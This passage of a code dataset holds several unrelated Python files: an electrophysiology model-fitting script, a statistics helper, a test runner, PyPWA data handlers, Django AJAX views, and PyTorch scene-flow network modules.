fit_seed)\nnp.random.seed(fit_seed)\n\n# Set parameter transformation\ndef transform_to_model_param(v):\n i = [0, 1, 2]\n o = np.copy(v)\n o[i] = np.exp(o[i])\n return o\n\ndef 
transform_from_model_param(v):\n i = [0, 1, 2]\n o = np.copy(v)\n o[i] = np.log(o[i])\n return o\n\n# Model\nmodel = m.Model('../mmt-model-files/simplified-voltage-clamp-mc3.mmt',\n protocol_def=protocol_def,\n temperature=273.15 + 23.0, # K\n transform=transform_to_model_param,\n readout='voltageclamp.Iin',\n useFilterCap=False)\nparameters = [\n 'mc.gk',\n 'mc.ck',\n 'mc.gm',\n 'voltageclamp.voffset_eff',\n]\nmodel.set_parameters(parameters)\nparameter_to_fix = [\n 'voltageclamp.cprs',\n 'voltageclamp.cm_est',\n 'voltageclamp.rseries',\n 'voltageclamp.rseries_est',\n]\nparameter_to_fix_values = [\n 4.7, # pF; Cprs\n 41.19, # pF; Cm* (assume it's the same as Cm)\n 33.6e-3, # GOhm; Rs (assume it's the same as Rs*)\n 33.6e-3 * 0.8, # GOhm; Rs* * alpha\n]\nfix_p = {}\nfor i, j in zip(parameter_to_fix, parameter_to_fix_values):\n fix_p[i] = j\nmodel.set_fix_parameters(fix_p)\n\n\n#\n# Fit\n#\n\n# Create Pints stuffs\nproblem = pints.SingleOutputProblem(model, times, data)\nerror = pints.RootMeanSquaredError(problem)\nlower = [\n 0.1, # pA/mV = 1/GOhm; g_kinetics\n 1., # pF; C_kinetics\n 0.1, # pA/mV = 1/GOhm; g_membrane\n -20., # mV; Voffset+\n]\nupper = [\n 100., # pA/mV = 1/GOhm; g_kinetics\n 1e5, # pF; C_kinetics\n 100., # pA/mV = 1/GOhm; g_membrane\n 20., # mV; Voffset+\n]\nboundaries = pints.RectangularBoundaries(transform_from_model_param(lower),\n transform_from_model_param(upper))\n\n# Check error is working fine\nidealparams = [\n 1. / 0.1, # pA/mV = 1/GOhm; g_kinetics\n 1000., # pF; C_kinetics\n 1. / 0.5, # pA/mV = 1/GOhm; g_membrane\n 0.0, # mV; Voffset+\n]# + [2.5] # pA; noise\npriorparams = [\n 1., # pA/mV = 1/GOhm; g_kinetics\n 10., # pF; C_kinetics\n 1., # pA/mV = 1/GOhm; g_membrane\n 0., # mV; Voffset+\n]# + [2.5] # pA; noise\ntransform_priorparams = transform_from_model_param(priorparams)\nprint('Score at prior parameters: ',\n error(transform_priorparams))\nprint(error(transform_from_model_param(idealparams)))\np = [\n 3.88407846048540421e+02,\n 1.44850672516807253e+03,\n 1.04988672817989661e-05,\n 2.04243756821879145e+01,\n]\nprint(error(transform_from_model_param(p)))\nfor _ in range(10):\n assert(error(transform_priorparams) ==\\\n error(transform_priorparams))\n\n# Run\ntry:\n N = int(sys.argv[1])\nexcept IndexError:\n N = 3\n\nparams, errors = [], []\n\nfor i in range(N):\n\n for _ in range(100):\n try:\n if i == 0:\n x0 = transform_priorparams\n else:\n # Randomly pick a starting point\n x0 = boundaries.sample()[0]\n error(x0)\n except ValueError:\n continue\n break\n print('Starting point: ', x0)\n\n # Create optimiser\n print('Starting error: ', error(x0))\n opt = pints.Optimisation(error, x0.T, boundaries=boundaries,\n method=pints.CMAES)\n opt.set_max_iterations(None)\n opt.set_max_unchanged_iterations(iterations=100, threshold=1e-5)\n opt.set_parallel(False)\n\n # Run optimisation\n try:\n with np.errstate(all='ignore'):\n # Tell numpy not to issue warnings\n p, s = opt.run()\n p = transform_to_model_param(p)\n params.append(p)\n errors.append(s)\n print('Found solution: Ideal parameters:' )\n for k, x in enumerate(p):\n print(pints.strfloat(x) + ' ' + \\\n pints.strfloat(idealparams[k]))\n except ValueError:\n import traceback\n traceback.print_exc()\n\n#\n# Done\n#\n\n# Order from best to worst\norder = np.argsort(errors) # (use [::-1] for LL)\nerrors = np.asarray(errors)[order]\nparams = np.asarray(params)[order]\n\n# Show results\nbestn = min(3, N)\nprint('Best %d errors:' % bestn)\nfor i in range(bestn):\n print(errors[i])\nprint('Mean & std of 
error:')\nprint(np.mean(errors))\nprint(np.std(errors))\nprint('Worst error:')\nprint(errors[-1])\n\n# Extract best 3\nobtained_error0 = errors[0]\nobtained_parameters0 = params[0]\nobtained_error1 = errors[1]\nobtained_parameters1 = params[1]\nobtained_error2 = errors[2]\nobtained_parameters2 = params[2]\n\n# Show results\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-1.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, x in enumerate(obtained_parameters0):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-2.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, x in enumerate(obtained_parameters1):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-3.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, x in enumerate(obtained_parameters2):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\n\nfig, axes = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\nsol0 = problem.evaluate(transform_from_model_param(obtained_parameters0))\nsol1 = problem.evaluate(transform_from_model_param(obtained_parameters1))\nsol2 = problem.evaluate(transform_from_model_param(obtained_parameters2))\nvol = model.voltage(times)\naxes[0].plot(times, vol, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[1].plot(times, data, alpha=0.5, label='data')\naxes[1].plot(times, sol0, label='found solution 1')\naxes[1].plot(times, sol1, label='found solution 2')\naxes[1].plot(times, sol2, label='found solution 3')\naxes[1].legend()\naxes[1].set_ylabel('Current (pA)')\naxes[1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-solution-%s.png' % (savedir, saveas, fit_seed),\n bbox_inches='tight')\nplt.close()\n","sub_path":"model-cell-experiments/fit-mc3simvc.py","file_name":"fit-mc3simvc.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"130698815","text":"import math\nimport pandas as pd\nimport numpy as np\n\nclass CentralTendency:\n def __init__(self):\n pass\n \n def Mean(self, values):\n summation = 0\n for x in values:\n summation = summation + x\n mean = summation / len(values)\n return mean\n\n def StandardDeviation(self, values):\n \n mean = self.Mean(values)\n deviation = 0\n for x in values:\n deviation = deviation + ( (x - mean) * (x - mean) )\n standardDeviation = math.sqrt(deviation / (len(values) - 1))\n return standardDeviation\n\n def PearsonCorrelation(self, x, y):\n xMean = self.Mean(x)\n yMean = self.Mean(y)\n\n stdX = self.StandardDeviation(x)\n stdY = self.StandardDeviation(y)\n summ = 0\n for i in range(len(x)):\n summ += (x[i] - xMean) * (y[i] - yMean)\n\n rxy = summ / ((len(x)-1) * stdX * stdY)\n return rxy\n\n def MinMaxNorm(self, values):\n xMin = min(values)\n xMax = max(values)\n newValues = []\n for i in range(len(values)):\n newValues.append( (values[i] - xMin) / (xMax - xMin)) \n \n return newValues\n\n\ndef main():\n data = pd.read_csv(\"toy-example.csv\")\n heights = data['Height']\n print(heights)\n weights = data['Weight']\n calc = CentralTendency()\n\n stdForHeight = calc.StandardDeviation(heights)\n stdForWeight = calc.StandardDeviation(weights)\n\n print(stdForHeight)\n 
print(stdForWeight)\n print(np.std(heights, ddof=1))\n print(np.std(weights, ddof=1))\n\n rxy = calc.PearsonCorrelation(heights, weights)\n \n # print(data.corr(method='pearson'))\n if abs(rxy) < 0.00005:\n print(\"No Corelation : \", rxy)\n elif rxy > 0:\n print(\"Positive Correlation : \", rxy)\n elif rxy < 0:\n print(\"Negative Correlation : \", rxy)\n\n normedHeights = calc.MinMaxNorm(heights)\n normedWeights = calc.MinMaxNorm(weights)\n\n print(normedHeights)\n\n rxy = calc.PearsonCorrelation(heights, weights)\n\n if abs(rxy) < 0.00005:\n print(\"No Corelation : \", rxy)\n elif rxy > 0:\n print(\"Positive Correlation : \", rxy)\n elif rxy < 0:\n print(\"Negative Correlation : \", rxy)\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Exercise-02/CentralTendency.py","file_name":"CentralTendency.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"432455159","text":"#!/usr/bin/env python\n\n# Import libraries\nimport os\nimport sys\nimport json\nimport logging\n\n# Start logger\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(level=logging.DEBUG, filename='output.log', filemode='w')\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n# Import environment variables\nenv_path = os.path.join(os.path.dirname(__file__), 'dev.env')\ntry:\n with open(env_path) as f:\n env_data = json.load(f)\n os.environ.update(env_data)\nexcept Exception as error:\n logger.exception('Could not load dev.env due to %s.', str(error))\nos.environ['local'] = 'true'\n\n# Update path\nsys.path.insert(\n 0, \n os.path.abspath(\n os.path.join(\n os.path.dirname(__file__), \n '..'\n )\n )\n)\n\n\ndef generate_event(detail=None):\n \"\"\"Generate a test EventBridge event with the given detail.\"\"\"\n detail = {} if detail is None else detail\n return {\n 'Records': [\n {\n 'source': 'testing.local',\n 'detail-type': 'Local Testing',\n 'detail': json.dumps(detail),\n }\n ]\n }\n\n\nif __name__ == \"__main__\":\n from handler import main\n\n with open('bookdata.json') as file:\n event = generate_event(json.load(file))\n response = main(event)\n\n logger.info('Reports: %s', json.dumps(response, indent=2))\n with open('reports.json', 'w') as reports:\n json.dump(response, reports, indent=2)","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"197201730","text":"\"\"\"\nA collection of file handlers for PyPWA\n\"\"\"\n__author__ = \"Mark Jones\"\n__credits__ = [\"Mark Jones\", \"Josh Pond\"]\n__license__ = \"MIT\"\n__version__ = \"2.0.0\"\n__maintainer__ = \"Mark Jones\"\n__email__ = \"maj@jlab.org\"\n__status__ = \"Beta0\"\n\nimport PyPWA.data.data_tools as data_tools\nfrom PyPWA.data.memory import sv, kv\nimport os\nimport yaml\n\n\nclass DataInterface(object):\n \"\"\"Interface for Data Objects\"\"\"\n\n @staticmethod\n def parse(file_location):\n raise NotImplementedError(\"Object doesn't implement parse()\")\n\n @staticmethod\n def write(file_location, data):\n raise NotImplementedError(\"Object doesn't implement write()\")\n\n\nclass Kv(DataInterface):\n\n @staticmethod\n def parse(file_location):\n with open(file_location) as stream:\n first_line = stream.readline()\n\n if \"=\" in first_line:\n reader = kv.DictOfArrays()\n elif len(first_line.strip(\"\\n\")) == 1:\n reader = kv.ListOfBooleans()\n 
elif len(first_line.strip(\"\\n\")) > 1:\n reader = kv.ListOfFloats()\n else:\n raise TypeError(\"Unknown data type for {0} !\".format(file_location))\n\n return reader.parse(file_location)\n\n @staticmethod\n def write(file_location, data):\n data_check = data_tools.DataTypes()\n the_type = data_check.type(data)\n\n if the_type == \"dictofarrays\":\n writer = kv.DictOfArrays()\n elif the_type == \"listofbools\":\n writer = kv.ListOfBooleans()\n elif the_type == \"listoffloats\":\n writer = kv.ListOfFloats()\n else:\n raise TypeError(\"Unknown type {0} !\".format(the_type))\n\n writer.write(file_location, data)\n\n\nclass Sv(DataInterface):\n\n @staticmethod\n def parse(file_location):\n file_ext = os.path.splitext(file_location)[1]\n\n if file_ext == \".tsv\":\n parser = sv.SvParser(\"\\t\")\n elif file_ext == \".csv\":\n parser = sv.SvParser(\",\")\n else:\n raise TypeError(\"Variable separated files must end in .tsv or .csv!\")\n\n return parser.reader(file_location)\n\n @staticmethod\n def write(file_location, data):\n raise NotImplementedError(\"Writing of Variable Separated files is not yet supported\")\n\n\nclass Binary(DataInterface):\n def __init__(self):\n raise NotImplementedError(\"There isn't any defined standard yet\")\n\n\nclass Yaml(DataInterface):\n \"\"\"YAML Parsing Object\"\"\"\n\n @staticmethod\n def parse(file_location):\n \"\"\"Parses Yaml configuration files from disk\n Args:\n file_location (str): Path to the file\n Returns:\n dict: The values stored in a multidimensional dictionary\n \"\"\"\n with open(file_location) as stream:\n saved = yaml.load(stream)\n return saved\n\n @staticmethod\n def write(file_location, data):\n \"\"\"Writes YAML Configs to disk\n Args:\n file_location (str): Path to the file\n data (dict): Dictionary to write.\n \"\"\"\n\n with open(file_location, \"w\") as stream:\n stream.write(yaml.dump(data))\n","sub_path":"PyPWA/data/memory_wrapper.py","file_name":"memory_wrapper.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"470734828","text":"from django.conf import settings\r\nfrom django.http import JsonResponse, FileResponse\r\nfrom django.template.loader import render_to_string\r\nfrom django.utils.translation import ugettext as _\r\n\r\nimport os\r\n\r\nfrom main.forms import *\r\n\r\n# ajax api\r\n\r\n#@ajax_only('GET')\r\ndef tree_root_nodes(request, nodes_form=TreeRootForm):\r\n # tree of left panel, root paging by letter\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = nodes_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef tree_children_nodes(request, nodes_form=TreeChildrenForm):\r\n # tree of left panel, children nodes of any rank\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = nodes_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_full_path(request, path_form=NodePathForm):\r\n # full path to a node\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = path_form(request, data=request.GET)\r\n if 
form.is_valid():\r\n data.update(form.get_result(type_name='dict'))\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\ndef node_detail(request, detail_form=NodeDetailForm, \r\n template_name='main/api/node_detail.html'):\r\n # detail information of a node\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-03-01\r\n data = {}\r\n form = detail_form(request, data=request.GET)\r\n if form.is_valid():\r\n data_tmp = form.get_result()\r\n html_tmp = render_to_string(template_name, data_tmp['data']['json'])\r\n html_tmp_list = html_tmp.split('');\r\n data_tmp['data']['html'] = {\r\n 'description': html_tmp_list[0],\r\n 'omics': html_tmp_list[1],\r\n 'data': html_tmp_list[2],\r\n }\r\n data.update(data_tmp)\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef tree_visualization_data(request, data_form=TreeVisualForm):\r\n # data of a tree for visualization\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = data_form(request, data=request.GET)\r\n if form.is_valid():\r\n data = form.get_result()\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_filter(request, filter_form=NodeForm):\r\n # filter a node by name only\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = filter_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_filter_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_search(request, search_form=NodeForm, template_name='main/api/node_search.html'):\r\n # full text search result of a search\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-03-03\r\n data = {'code': 0}\r\n form = search_form(request, data=request.GET)\r\n if form.is_valid():\r\n tmp_data = form.get_search_result()\r\n data['data'] = {\r\n 'html': render_to_string(template_name, tmp_data['data']), \r\n 'total': tmp_data['data']['total'],\r\n 'time': tmp_data['data']['time'],\r\n }\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\ndef download(request, filename=None):\r\n # return a file\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n if filename is not None:\r\n filepath = settings.DATA_FILE_DIR + filename\r\n if os.path.exists(filepath):\r\n response = FileResponse(open(filepath, 'rb'), content_type='application/plain-text')\r\n response['Content-Disposition'] = ('attachment; filename=\"%s\"' % filename)\r\n return response\r\n return JsonResponse({\r\n 'code': 2,\r\n 'error': 'invalid_link',\r\n })\r\n ","sub_path":"website/main/views/ajax_api.py","file_name":"ajax_api.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"424923373","text":"from __future__ import absolute_import, division, print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as tf\nimport logging \n\nfrom utils.interpolation import interpolate2d_as\nfrom utils.sceneflow_util import pixel2pts_ms, pts2pixel_ms, pts2pixel\nfrom utils.sceneflow_util import pixel2pts_ms_and_depth, pixel2pts_ms_from_depth, 
pixel2pts_ms_and_uv1grid, disp2depth_kitti, depth2disp_kitti\n\nfrom utils.interpolation import interpolate2d_as_enlarge_only\n\ndef get_grid(x):\n grid_H = torch.linspace(-1.0, 1.0, x.size(3)).view(1, 1, 1, x.size(3)).expand(x.size(0), 1, x.size(2), x.size(3))\n grid_V = torch.linspace(-1.0, 1.0, x.size(2)).view(1, 1, x.size(2), 1).expand(x.size(0), 1, x.size(2), x.size(3))\n grid = torch.cat([grid_H, grid_V], 1)\n grids_cuda = grid.float().requires_grad_(False).cuda()\n return grids_cuda\n\n\nclass WarpingLayer_Flow(nn.Module):\n def __init__(self):\n super(WarpingLayer_Flow, self).__init__()\n\n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n def forward(self, x, flow):\n flo_list = []\n flo_w = flow[:, 0] * 2 / max(x.size(3) - 1, 1)\n flo_h = flow[:, 1] * 2 / max(x.size(2) - 1, 1)\n flo_list.append(flo_w)\n flo_list.append(flo_h)\n flow_for_grid = torch.stack(flo_list).transpose(0, 1)\n grid = torch.add(get_grid(x), flow_for_grid).transpose(1, 2).transpose(2, 3) \n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones(x.size(), requires_grad=False).cuda()\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\nclass WarpingLayer_FlowNormalized(nn.Module):\n def __init__(self):\n super(WarpingLayer_FlowNormalized, self).__init__()\n\n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n def forward(self, x, flow):\n\n _, _, h_x, w_x = x.size()\n assert flow.shape[2] == h_x, \"{} {}\".format(x.shape, flow.shape)\n assert flow.shape[3] == w_x, \"{} {}\".format(x.shape, flow.shape)\n flow = flow * w_x\n \n flo_list = []\n flo_w = flow[:, 0] * 2 / max(x.size(3) - 1, 1)\n flo_h = flow[:, 1] * 2 / max(x.size(2) - 1, 1)\n flo_list.append(flo_w)\n flo_list.append(flo_h)\n flow_for_grid = torch.stack(flo_list).transpose(0, 1)\n grid = torch.add(get_grid(x), flow_for_grid).transpose(1, 2).transpose(2, 3) \n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones(x.size(), requires_grad=False).cuda()\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\n\nclass WarpingLayer_SF(nn.Module):\n def __init__(self, reg_depth):\n super(WarpingLayer_SF, self).__init__()\n \n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n self.reg_depth = reg_depth\n\n def forward(self, x, sceneflow, disp, k1, input_size):\n\n _, _, h_x, w_x = x.size()\n local_scale = torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n ### adapt to 
depth input\n if self.reg_depth:\n depth = disp\n pts1, k1_scale = pixel2pts_ms_from_depth(k1, depth, local_scale / input_size)\n _, _, coord1 = pts2pixel_ms(k1_scale, pts1, sceneflow, [h_x, w_x])\n\n else:\n disp = interpolate2d_as(disp, x) * w_x\n pts1, k1_scale = pixel2pts_ms(k1, disp, local_scale / input_size)\n _, _, coord1 = pts2pixel_ms(k1_scale, pts1, sceneflow, [h_x, w_x])\n\n grid = coord1.transpose(1, 2).transpose(2, 3)\n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones_like(x, requires_grad=False)\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\n\ndef initialize_msra(modules):\n logging.info(\"Initializing MSRA\")\n for layer in modules:\n if isinstance(layer, nn.Conv2d):\n nn.init.kaiming_normal_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n elif isinstance(layer, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n elif isinstance(layer, nn.LeakyReLU):\n pass\n\n elif isinstance(layer, nn.Sequential):\n pass\n\n\ndef upsample_outputs_as(input_list, ref_list):\n output_list = []\n for ii in range(0, len(input_list)):\n output_list.append(interpolate2d_as(input_list[ii], ref_list[ii]))\n\n return output_list\n\n### add an enlarge_only mode\ndef upsample_outputs_as_enlarge_only(input_list, ref_list):\n output_list = []\n for ii in range(0, len(input_list)):\n output_list.append(interpolate2d_as_enlarge_only(input_list[ii], ref_list[ii]))\n\n return output_list\n\ndef conv(in_planes, out_planes, kernel_size=3, stride=1, dilation=1, isReLU=True):\n if isReLU:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, dilation=dilation,\n padding=((kernel_size - 1) * dilation) // 2, bias=True),\n nn.LeakyReLU(0.1, inplace=True)\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, dilation=dilation,\n padding=((kernel_size - 1) * dilation) // 2, bias=True)\n )\n\n\nclass upconv(nn.Module):\n def __init__(self, num_in_layers, num_out_layers, kernel_size, scale):\n super(upconv, self).__init__()\n self.scale = scale\n self.conv1 = conv(num_in_layers, num_out_layers, kernel_size, 1)\n\n def forward(self, x):\n x = nn.functional.interpolate(x, scale_factor=self.scale, mode='nearest')\n return self.conv1(x)\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, num_chs):\n super(FeatureExtractor, self).__init__()\n self.num_chs = num_chs\n self.convs = nn.ModuleList()\n\n for l, (ch_in, ch_out) in enumerate(zip(num_chs[:-1], num_chs[1:])):\n layer = nn.Sequential(\n conv(ch_in, ch_out, stride=2),\n conv(ch_out, ch_out)\n )\n self.convs.append(layer)\n\n def forward(self, x):\n feature_pyramid = []\n for conv in self.convs:\n x = conv(x)\n feature_pyramid.append(x)\n\n return feature_pyramid[::-1]\n\n\nclass MonoSceneFlowDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n 
self.conv_d1 = conv(32, 1, isReLU=False)\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n return x_out, sf, disp1, None, None\n\nclass MonoSceneFlowUVDDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowUVDDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n self.sf_nl = torch.nn.Sigmoid()\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n sf = self.sf_nl(sf) * 0.3\n sf = 2 * sf - 0.3\n\n return x_out, sf, disp1, None, None\n\nclass MonoSceneFlowMaskDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowMaskDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n self.conv_mask = conv(32, 1, isReLU=False)\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n mask = self.conv_mask(x_out)\n mask = torch.sigmoid(mask)\n\n return x_out, sf, disp1, None, mask\n\nclass PoseHead(nn.Module):\n def __init__(self, separable):\n super(PoseHead, self).__init__()\n if separable:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n nn.Linear(85, 16), # B*N(32)*C(16)\n # nn.Linear(43, 16), # B*N(32)*C(16)\n nn.ReLU(), \n Transpose(-1, -2), # B*C(16)*N(32)\n nn.Linear(32, 16), # B*C(16)*N(16)\n nn.ReLU(), \n Flatten(), # B*N(256)\n nn.Linear(256, 6) # B*N(6)\n )\n else:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]),\n Flatten(),\n nn.Linear(85*32, 16), \n nn.ReLU(), \n nn.Linear(16, 6), \n )\n def forward(self, x):\n pose = self.conv_pose(x)\n return pose\n \n\nclass MonoSceneFlowPoseDecoder(nn.Module):\n def __init__(self, ch_in, separable, conv_pose=None):\n super(MonoSceneFlowPoseDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n\n self.conv_mask = conv(32, 1, isReLU=False)\n\n ### separable\n # self.conv_pose = nn.Sequential(\n # SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n # Transpose(-1, -2), # B*N(43)*C(32)\n # nn.Linear(32, 16), # B*N(43)*C(16)\n # nn.BatchNorm1d(43), \n # nn.ReLU(), \n # Transpose(-1, -2), # B*C(16)*N(43)\n # nn.Linear(43, 16), # B*C(16)*N(16)\n # nn.BatchNorm1d(16), \n # nn.ReLU(), \n # Flatten(), # B*N(256)\n # nn.Linear(256, 6) # B*N(6)\n # )\n if conv_pose is None:\n if separable:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n nn.Linear(85, 16), # B*N(32)*C(16)\n # nn.Linear(43, 16), # B*N(32)*C(16)\n nn.ReLU(), \n Transpose(-1, -2), # B*C(16)*N(32)\n nn.Linear(32, 16), # B*C(16)*N(16)\n nn.ReLU(), \n Flatten(), # B*N(256)\n nn.Linear(256, 6) # B*N(6)\n )\n else:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]),\n Flatten(),\n nn.Linear(85*32, 16), \n nn.ReLU(), \n nn.Linear(16, 6), \n )\n else:\n self.conv_pose = conv_pose\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n pose = self.conv_pose(x_out)\n # pose = pose * 0.1\n # 
